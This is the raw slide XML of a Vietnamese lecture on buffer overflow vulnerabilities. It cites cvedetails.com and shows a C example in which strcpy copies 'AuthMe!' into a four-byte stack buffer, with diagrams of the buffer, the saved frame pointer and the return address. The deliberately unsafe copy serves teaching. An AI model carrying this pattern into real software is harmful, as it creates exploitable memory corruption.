                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{980BEC4F-E1C3-D70A-2462-D34425B36596}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1211588"/>
            <a:ext cx="5486400" cy="2622980"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3324974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EA4A2E3-5F78-FF20-015E-75306A0B188B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="253093" y="1524001"/>
            <a:ext cx="8580758" cy="3839150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E98EEDD-F752-472E-A35B-871424D1BCAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Sự phổ biến của lỗ hổng Overflow</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0451F7A-9A14-4A30-B09A-6733E996A219}"/>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6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEB64770-EEF6-6B85-2225-FC35F1A2934B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5605046"/>
            <a:ext cx="3962400" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" i="1"/>
              <a:t>Nguồn: cvedetails.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32FB8795-A926-E981-1F18-7B569841DD92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248400" y="1447800"/>
            <a:ext cx="1295400" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{968597FE-266B-82CB-6F0F-679023C1E173}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="1828800"/>
            <a:ext cx="1524000" cy="2209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13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200"/>
              <a:t>1. Tổng quan về tiến trình (nhắc lại)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="360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6" name="Subtitle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{235D7B8F-0EE3-E46C-2EA7-EB4F24AF87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85338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D763-99AD-4E7E-8829-EA5DEA1C0BBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ví dụ về tràn bộ đệm</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28D20907-4C9A-46F3-9572-FDE28AE484A3}"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C612B09F-1D74-4C43-B038-C7013E6018B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="922105" y="1066800"/>
            <a:ext cx="7162800" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void func(char *arg1)</a:t>
            </a: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   char buffer[4];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   strcpy(buffer, arg1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return;</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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int main()</a:t>
            </a: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   char *mystr = “AuthMe!”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   func(mystr);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>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9F568791-A8A1-4321-950A-D32E68C1A10A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="5273812"/>
            <a:ext cx="83820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C31BA996-0111-4687-8807-33DD728ABF80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="261936" y="5375412"/>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Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49E41BC9-1592-45C9-97CC-315D79EC4C16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7573157" y="5414304"/>
            <a:ext cx="1134513"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&amp;arg1</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>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CA000187-6DE4-43D2-8F72-00F8F54D260B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1555391" y="5429019"/>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00 00 00 00</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="0000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57CDEB32-AB71-4361-B29E-36AC27CAFB9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1622975" y="601980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a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>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D188E936-D4B1-4E07-9F2D-844E7807D13C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3561313" y="5429019"/>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SFP</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B65CE70-213B-4D43-AA2A-0B128ADE04DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5567235" y="5420655"/>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RIP</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Arrow: Right 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA171EBA-E3A4-43B2-B590-7643C9711F5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="3887250"/>
            <a:ext cx="304800" cy="228600"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8559BB03-DB4D-075B-24C8-6BCC99B4998F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315200" y="4871079"/>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Địa chỉ cao</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">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4FED3F4-790C-467D-EED9-F5A9D5455A44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239315" y="4923191"/>
            <a:ext cx="2416969"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Địa chỉ thấp</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">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9425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D763-99AD-4E7E-8829-EA5DEA1C0BBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ví dụ về tràn bộ đệm</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28D20907-4C9A-46F3-9572-FDE28AE484A3}"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C612B09F-1D74-4C43-B038-C7013E6018B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="922105" y="990600"/>
            <a:ext cx="7162800" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void func(char *arg1)</a:t>
            </a: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   char buffer[4];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   strcpy(buffer, arg1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return;</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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int main()</a:t>
            </a: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   char *mystr = “AuthMe!”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   func(mystr);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Arrow: Right 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C90131C-8B39-41C4-A007-FB302AC51E5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1982250"/>
            <a:ext cx="304800" cy="228600"/>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5661E9E6-10D8-49DF-8CD0-C984F9D00944}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="5201641"/>
            <a:ext cx="83820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BB42B120-765A-4A42-B13E-6A2F10F14533}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="261936" y="5303241"/>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1" name="Rectangle 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2FE4C2F-7905-4232-9213-725DCDD8CBC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7573157" y="5342133"/>
            <a:ext cx="1134513"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&amp;arg1</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>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241BBCC6-4449-408E-A791-6763F3720026}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1555391" y="5356848"/>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  u  t  h</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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F55B600A-C20D-49A1-BF8A-B51C465530E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1622975" y="600174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a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EADA3BBF-843D-406D-AACF-7CD6710C34BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3561313" y="5356848"/>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4d 65 21 00</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>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BAF0DC4B-39B9-4368-8CA1-AFDA4086D8FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5567235" y="5348484"/>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RIP</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0A368E8-4227-459D-A06E-D287F4C9C35D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3548062" y="485874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M  e  ! \0</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">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5256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D763-99AD-4E7E-8829-EA5DEA1C0BBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ví dụ về tràn bộ đệm</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28D20907-4C9A-46F3-9572-FDE28AE484A3}"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C612B09F-1D74-4C43-B038-C7013E6018B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="922105" y="990600"/>
            <a:ext cx="7162800" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void func(char *arg1)</a:t>
            </a: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   char buffer[4];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   strcpy(buffer, arg1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return;</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
